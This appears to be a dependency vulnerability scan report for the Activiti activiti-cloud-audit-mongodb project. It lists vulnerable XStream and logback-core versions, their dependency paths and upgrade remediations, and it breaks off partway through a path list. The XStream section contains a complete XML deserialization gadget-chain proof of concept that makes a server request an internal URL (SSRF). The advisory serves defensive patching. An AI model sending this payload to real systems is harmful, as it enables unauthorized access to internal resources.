Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available (SSRF) only by manipulating the processed input stream.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='javafx.collections.ObservableList$1'/>
</default>
<int>3</int>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='com.sun.xml.internal.ws.util.ServiceFinder$ServiceNameIterator'>
<configs class='sun.misc.FIFOQueueEnumerator'>
<queue>
<length>1</length>
<head>
<obj class='url'>http://localhost:8080/internal/</obj>
</head>
<tail reference='../head'/>
</queue>
<cursor reference='../queue/head'/>
</configs>
<returned class='sorted-set'/>
</iterator>
<type>KEYS</type>
</e>
<in class='java.io.ByteArrayInputStream'>
<buf></buf>
<pos>0</pos>
<mark>0</mark>
<count>0</count>
</in>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
medium severity
- Vulnerable module: ch.qos.logback:logback-core
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-logging@7-201802-EA › net.logstash.logback:logstash-logback-encoder@4.11 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
Overview
ch.qos.logback:logback-core is a logback-core module.
Affected versions of this package are vulnerable to External Initialization of Trusted Variables or Data Stores via the conditional processing of the logback.xml configuration file when both the Janino library and Spring Framework are present on the class path. An attacker can execute arbitrary code by compromising an existing configuration file or injecting a malicious environment variable before program execution. This is only exploitable if the attacker has write access to a configuration file or can set a malicious environment variable.
Remediation
Upgrade ch.qos.logback:logback-core to version 1.5.19 or higher.
References
medium severity
- Vulnerable module: ch.qos.logback:logback-core
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-logging@7-201802-EA › net.logstash.logback:logstash-logback-encoder@4.11 › ch.qos.logback:logback-core@1.2.3
-
